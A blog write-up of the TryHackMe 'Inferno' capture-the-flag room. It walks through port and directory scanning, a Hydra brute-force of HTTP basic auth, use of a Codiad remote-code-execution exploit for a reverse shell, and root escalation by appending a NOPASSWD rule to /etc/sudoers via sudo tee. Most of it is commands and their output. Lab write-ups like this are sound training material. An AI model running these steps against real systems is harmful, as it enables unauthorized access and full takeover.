TryHackMe | Inferno
I recently completed the TryHackMe room Inferno. This was a medium rated room and I think that was a pretty accurate rating.
I started this capture the flag room the same as any other, with a port scan using the nmap tool.
gareth@enso:~/Desktop/Files/Inferno$ nmap -F 10.10.170.49 -oN inferno.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-13 21:28 CEST
Nmap scan report for 10.10.170.49
Host is up (0.039s latency).
Not shown: 97 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
106/tcp open pop3pwI could see there was a web server running on port 80, so I decided to scan for any directories that may be hidden. My initial scan using the common.txt wordlist returned nothing of interest, so I tried again with the medium directory list. This turned up a directory that was protected by basic authentication, called inferno.
gareth@enso:~/Desktop/Files/Inferno$ gobuster dir -u http://10.10.170.49 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.170.49
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/13 21:31:58 Starting gobuster in directory enumeration mode
===============================================================
/inferno (Status: 401) [Size: 459]I then used Hydra to crack the password to this area, assuming the default username of 'admin' was the one used. Luckily this assumption paid off and I gained access to the area.
gareth@enso:~/Desktop/Files/Inferno$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 10.10.170.49 http-get /inferno -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-13 21:34:33
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.170.49:80/inferno
[80][http-get] host: 10.10.170.49 login: admin password: <redacted>
[STATUS] attack finished for 10.10.170.49 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-13 21:35:28Codiad
I was presented with a login form for what looks like a tool called "Codiad". I searched for an exploit for Codiad using searchsploit and found the following.
Because these exploits required the user to be authenticated, I tried to reuse the credentials from the basic authentication. This proved successful and I was able to login.
gareth@enso:~/Desktop/Files/Inferno$ searchsploit Codiad
---------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated) | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2) | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3) | multiple/webapps/49907.py
---------------------------------------------------------- ---------------------------------After some trial and error with these I could not get any of them to work, so I instead decided to search GitHub and came across a repository that contained an exploit for Codiad which I managed to get working.
I was able to get a reverse-shell on the machine by following the instructions in the exploit file.
Foothold
Now I had a foothold on the server, it was time to enumerate. I found an interesting file eventually in the /home/dante/Downloads directory called .download.dat which contained what looked like some hexadecimal. I used Cyberchef to convert this hexadecimal to ASCII and was presented with the following:
«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.
«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.
Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.
Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».
dante:<redacted>With the credentials at the bottom I was able to access the server via SSH as the dante user and capture the user flag, which was hidden in the local.txt file in the home directory.
gareth@enso:~/Desktop/Files/Inferno$ ssh dante@10.10.170.49
dante@10.10.170.49's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-130-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Aug 13 20:11:10 UTC 2021
System load: 0.0 Processes: 1198
Usage of /: 42.0% of 8.79GB Users logged in: 0
Memory usage: 61% IP address for eth0: 10.10.170.49
Swap usage: 0%
39 packages can be updated.
0 updates are security updates.
Last login: Fri Aug 13 20:10:56 2021 from 10.8.145.210
dante@Inferno:~$ cat local.txtPrivilege Escalation
From running the command sudo -l I can see that the dante user has permissions to run the tee command as sudo.
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dante may run the following commands on Inferno:
(root) NOPASSWD: /usr/bin/teeA quick check on GTFOBins showed me how to use this command to gain write-access to any file on the file system.
LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"I used this to add the dante user to the /etc/sudoers file, and to allow him to run any command as sudo without a password. From there I was able to spawn a root shell and capture the root flag.
dante@Inferno:~$ LFILE=/etc/sudoers
dante@Inferno:~$ echo "dante ALL=(root) NOPASSWD: ALL" | sudo tee -a "$LFILE"
dante ALL=(root) NOPASSWD: ALL
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dante may run the following commands on Inferno:
(root) NOPASSWD: /usr/bin/tee
(root) NOPASSWD: ALL
dante@Inferno:~$ sudo su
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls
proof.txt
root@Inferno:~# cat proof.txt
Congrats!
You've rooted Inferno!
<redacted>
mindsflee
root@Inferno:~#Summary
This room took a bit of time to gain a foothold, due to me not being familiar with Codiad and spending a lot of time trying to find an exploit for it that actually worked. The reverse-shell gained from the exploit found on GitHub was a bit flaky so I had to enumerate quickly. I was thankful this room contained a step where I obtained the ssh user password so I could gain a more stable connection.
Thankfully the privilege escalation on this one was quite straight forward due to some poor configuration on the server and the great resource that is GTFOBins.